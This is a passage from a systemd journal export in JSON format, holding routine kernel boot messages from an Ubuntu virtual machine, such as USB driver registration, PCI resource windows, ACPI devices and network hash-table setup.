"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11c;b=e2b08827b5804427b422c10c84f1567e;m=569db8;t=5bd16dd1a1d20;x=97b8feb4e6f9b89", "__REALTIME_TIMESTAMP" : "1615280779959584", "__MONOTONIC_TIMESTAMP" : "5676472", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "366051", "MESSAGE" : "usbcore: registered new interface driver usbfs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11d;b=e2b08827b5804427b422c10c84f1567e;m=569dc3;t=5bd16dd1a1d2a;x=42fa479078c5c9e8", "__REALTIME_TIMESTAMP" : "1615280779959594", "__MONOTONIC_TIMESTAMP" : "5676483", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "368021", "MESSAGE" : "usbcore: registered new interface driver hub" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11e;b=e2b08827b5804427b422c10c84f1567e;m=569dcd;t=5bd16dd1a1d35;x=fa26700969233205", "__REALTIME_TIMESTAMP" : "1615280779959605", "__MONOTONIC_TIMESTAMP" : "5676493", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "370837", "MESSAGE" : "usbcore: registered new device driver usb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11f;b=e2b08827b5804427b422c10c84f1567e;m=569dd9;t=5bd16dd1a1d40;x=a30123e6c2ae603e", "__REALTIME_TIMESTAMP" : "1615280779959616", "__MONOTONIC_TIMESTAMP" : "5676505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "372107", "MESSAGE" : "EDAC MC: Ver: 3.0.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=120;b=e2b08827b5804427b422c10c84f1567e;m=569de3;t=5bd16dd1a1d4a;x=4154a9cbb9225c3a", "__REALTIME_TIMESTAMP" : "1615280779959626", "__MONOTONIC_TIMESTAMP" : "5676515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "374382", "MESSAGE" : "PCI: Using ACPI for IRQ routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=121;b=e2b08827b5804427b422c10c84f1567e;m=569ded;t=5bd16dd1a1d55;x=2f78176316d38990", "__REALTIME_TIMESTAMP" : "1615280779959637", "__MONOTONIC_TIMESTAMP" : "5676525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376022", "MESSAGE" : "PCI: pci_cache_line_size set to 64 bytes" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=122;b=e2b08827b5804427b422c10c84f1567e;m=569df8;t=5bd16dd1a1d5f;x=a1fa3e5d92e59af1", "__REALTIME_TIMESTAMP" : "1615280779959647", "__MONOTONIC_TIMESTAMP" : "5676536", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376268", "MESSAGE" : "e820: reserve RAM buffer [mem 0x0009fc00-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=123;b=e2b08827b5804427b422c10c84f1567e;m=569e08;t=5bd16dd1a1d70;x=33fcc6444001df97", "__REALTIME_TIMESTAMP" : "1615280779959664", "__MONOTONIC_TIMESTAMP" : "5676552", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376272", "MESSAGE" : "e820: reserve RAM buffer [mem 0x7ffdc000-0x7fffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=124;b=e2b08827b5804427b422c10c84f1567e;m=569e1a;t=5bd16dd1a1d81;x=7de80462cb8c7234", "__REALTIME_TIMESTAMP" : "1615280779959681", "__MONOTONIC_TIMESTAMP" : "5676570", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "376470", "MESSAGE" : "NetLabel: Initializing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=125;b=e2b08827b5804427b422c10c84f1567e;m=569e2d;t=5bd16dd1a1d95;x=745e5eda13f04557", "__REALTIME_TIMESTAMP" : "1615280779959701", "__MONOTONIC_TIMESTAMP" : "5676589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "378389", "MESSAGE" : "NetLabel: domain hash size = 128" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=126;b=e2b08827b5804427b422c10c84f1567e;m=569e3b;t=5bd16dd1a1da2;x=5eb1798268020a50", "__REALTIME_TIMESTAMP" : "1615280779959714", "__MONOTONIC_TIMESTAMP" : "5676603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "380004", "MESSAGE" : "NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=127;b=e2b08827b5804427b422c10c84f1567e;m=569e56;t=5bd16dd1a1dbd;x=f7c58fa3f2230516", "__REALTIME_TIMESTAMP" : "1615280779959741", "__MONOTONIC_TIMESTAMP" : "5676630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "383125", "MESSAGE" : "NetLabel: unlabeled traffic allowed by default" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=128;b=e2b08827b5804427b422c10c84f1567e;m=569e61;t=5bd16dd1a1dc8;x=daa121a1bb582c16", "__REALTIME_TIMESTAMP" : "1615280779959752", "__MONOTONIC_TIMESTAMP" : "5676641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "384157", "MESSAGE" : "clocksource: Switched to clocksource kvm-clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=129;b=e2b08827b5804427b422c10c84f1567e;m=569e7a;t=5bd16dd1a1de2;x=594e45daf27ba689", "__REALTIME_TIMESTAMP" : "1615280779959778", "__MONOTONIC_TIMESTAMP" : "5676666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "399085", "MESSAGE" : "VFS: Disk quotas dquot_6.6.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12a;b=e2b08827b5804427b422c10c84f1567e;m=569e85;t=5bd16dd1a1ded;x=1c5f6b3ad0a4a228", "__REALTIME_TIMESTAMP" : "1615280779959789", "__MONOTONIC_TIMESTAMP" : "5676677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "401433", "MESSAGE" : "VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12b;b=e2b08827b5804427b422c10c84f1567e;m=569e8f;t=5bd16dd1a1df7;x=e4ee10d3baf6d49a", "__REALTIME_TIMESTAMP" : "1615280779959799", "__MONOTONIC_TIMESTAMP" : "5676687", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "405167", "MESSAGE" : "AppArmor: AppArmor Filesystem Enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12c;b=e2b08827b5804427b422c10c84f1567e;m=569e9d;t=5bd16dd1a1e05;x=25ba10917f9ea7ff", "__REALTIME_TIMESTAMP" : "1615280779959813", "__MONOTONIC_TIMESTAMP" : "5676701", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "407740", "MESSAGE" : "pnp: PnP ACPI init" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12d;b=e2b08827b5804427b422c10c84f1567e;m=569f31;t=5bd16dd1a1e99;x=5b4cb66e7102180b", "__REALTIME_TIMESTAMP" : "1615280779959961", "__MONOTONIC_TIMESTAMP" : "5676849", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "409661", "MESSAGE" : "pnp 00:00: Plug and Play ACPI device, IDs PNP0b00 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12e;b=e2b08827b5804427b422c10c84f1567e;m=569fe9;t=5bd16dd1a1f51;x=85e432ba051410c7", "__REALTIME_TIMESTAMP" : "1615280779960145", "__MONOTONIC_TIMESTAMP" : "5677033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:01", "_UDEV_SYSNAME" : "00:01", "_SOURCE_MONOTONIC_TIMESTAMP" : "409719", "MESSAGE" : "pnp 00:01: Plug and Play ACPI device, IDs PNP0303 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12f;b=e2b08827b5804427b422c10c84f1567e;m=56a05f;t=5bd16dd1a1fc6;x=25b3311a744d6bbf", "__REALTIME_TIMESTAMP" : "1615280779960262", "__MONOTONIC_TIMESTAMP" : "5677151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:02", "_UDEV_SYSNAME" : "00:02", "_SOURCE_MONOTONIC_TIMESTAMP" : "409747", "MESSAGE" : "pnp 00:02: Plug and Play ACPI device, IDs PNP0f13 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=130;b=e2b08827b5804427b422c10c84f1567e;m=56a0ec;t=5bd16dd1a2054;x=b684f5eb4ed39c3e", "__REALTIME_TIMESTAMP" : "1615280779960404", "__MONOTONIC_TIMESTAMP" : "5677292", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409763", "MESSAGE" : "pnp 00:03: [dma 2]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=131;b=e2b08827b5804427b422c10c84f1567e;m=56a166;t=5bd16dd1a20cd;x=e03675d55dbb4263", "__REALTIME_TIMESTAMP" : "1615280779960525", "__MONOTONIC_TIMESTAMP" : "5677414", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409774", "MESSAGE" : "pnp 00:03: Plug and Play ACPI device, IDs PNP0700 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=132;b=e2b08827b5804427b422c10c84f1567e;m=56a1ed;t=5bd16dd1a2155;x=49979f895bc17be0", "__REALTIME_TIMESTAMP" : "1615280779960661", "__MONOTONIC_TIMESTAMP" : "5677549", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:04", "_UDEV_SYSNAME" : "00:04", "_SOURCE_MONOTONIC_TIMESTAMP" : "409905", "MESSAGE" : "pnp 00:04: Plug and Play ACPI device, IDs PNP0501 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=133;b=e2b08827b5804427b422c10c84f1567e;m=56a1fc;t=5bd16dd1a2163;x=82c61eaf87e091e3", "__REALTIME_TIMESTAMP" : "1615280779960675", "__MONOTONIC_TIMESTAMP" : "5677564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "410192", "MESSAGE" : "pnp: PnP ACPI: found 5 devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=134;b=e2b08827b5804427b422c10c84f1567e;m=56a208;t=5bd16dd1a216f;x=b32a5fd21dfbf6c0", "__REALTIME_TIMESTAMP" : "1615280779960687", "__MONOTONIC_TIMESTAMP" : "5677576", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "418312", "MESSAGE" : "clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=135;b=e2b08827b5804427b422c10c84f1567e;m=56a2b2;t=5bd16dd1a221a;x=71898ba80ca4cc7d", "__REALTIME_TIMESTAMP" : "1615280779960858", "__MONOTONIC_TIMESTAMP" : "5677746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423093", "MESSAGE" : "pci_bus 0000:00: resource 4 [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=136;b=e2b08827b5804427b422c10c84f1567e;m=56a327;t=5bd16dd1a228f;x=9f1677c6e475c2ad", "__REALTIME_TIMESTAMP" : "1615280779960975", "__MONOTONIC_TIMESTAMP" : "5677863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423094", "MESSAGE" : "pci_bus 0000:00: resource 5 [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=137;b=e2b08827b5804427b422c10c84f1567e;m=56a3c5;t=5bd16dd1a232d;x=9c27a678ac93cc5c", "__REALTIME_TIMESTAMP" : "1615280779961133", "__MONOTONIC_TIMESTAMP" : "5678021", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423095", "MESSAGE" : "pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=138;b=e2b08827b5804427b422c10c84f1567e;m=56a44b;t=5bd16dd1a23b3;x=d0ab404cb0387262", "__REALTIME_TIMESTAMP" : "1615280779961267", "__MONOTONIC_TIMESTAMP" : "5678155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423096", "MESSAGE" : "pci_bus 0000:00: resource 7 [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=139;b=e2b08827b5804427b422c10c84f1567e;m=56a4c1;t=5bd16dd1a2428;x=722c89e8012a5aec", "__REALTIME_TIMESTAMP" : "1615280779961384", "__MONOTONIC_TIMESTAMP" : "5678273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423097", "MESSAGE" : "pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13a;b=e2b08827b5804427b422c10c84f1567e;m=56a4d3;t=5bd16dd1a243a;x=114a06ded6048837", "__REALTIME_TIMESTAMP" : "1615280779961402", "__MONOTONIC_TIMESTAMP" : "5678291", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "423173", "MESSAGE" : "NET: Registered protocol family 2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13b;b=e2b08827b5804427b422c10c84f1567e;m=56a4de;t=5bd16dd1a2446;x=3e6d81c3cbbcd13", "__REALTIME_TIMESTAMP" : "1615280779961414", "__MONOTONIC_TIMESTAMP" : "5678302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "425901", "MESSAGE" : "TCP established hash table entries: 16384 (order: 5, 131072 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13c;b=e2b08827b5804427b422c10c84f1567e;m=56a4fc;t=5bd16dd1a2463;x=6147d9603b4d9b", "__REALTIME_TIMESTAMP" : "1615280779961443", "__MONOTONIC_TIMESTAMP" : "5678332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "429777", "MESSAGE" : "TCP bind hash table entries: 16384 (order: 6, 262144 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13d;b=e2b08827b5804427b422c10c84f1567e;m=56a516;t=5bd16dd1a247d;x=97f84b1d02a96c2f", "__REALTIME_TIMESTAMP" : "1615280779961469", "__MONOTONIC_TIMESTAMP" : "5678358", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "433287", "MESSAGE" : "TCP: Hash tables configured (established 16384 bind 16384)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13e;b=e2b08827b5804427b422c10c84f1567e;m=56a520;t=5bd16dd1a2487;x=d4e96f4c933619c5", "__REALTIME_TIMESTAMP" : "1615280779961479", "__MONOTONIC_TIMESTAMP" : "5678368", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "436714", "MESSAGE" : "UDP hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13f;b=e2b08827b5804427b422c10c84f1567e;m=56a52a;t=5bd16dd1a2491;x=41b21a0bbc5a2cab", "__REALTIME_TIMESTAMP" : "1615280779961489", "__MONOTONIC_TIMESTAMP" : "5678378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "439824", "MESSAGE" : "UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=140;b=e2b08827b5804427b422c10c84f1567e;m=56a534;t=5bd16dd1a249b;x=73da792df9470e3e", "__REALTIME_TIMESTAMP" : "1615280779961499", "__MONOTONIC_TIMESTAMP" : "5678388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "443248", "MESSAGE" : "NET: Registered protocol family 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=141;b=e2b08827b5804427b422c10c84f1567e;m=56a5c7;t=5bd16dd1a252e;x=658e67453d376da9", "__REALTIME_TIMESTAMP" : "1615280779961646", "__MONOTONIC_TIMESTAMP" : "5678535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "445582", "MESSAGE" : "pci 0000:00:00.0: Limiting direct PCI/PCI transfers" } { "__CURSOR" : 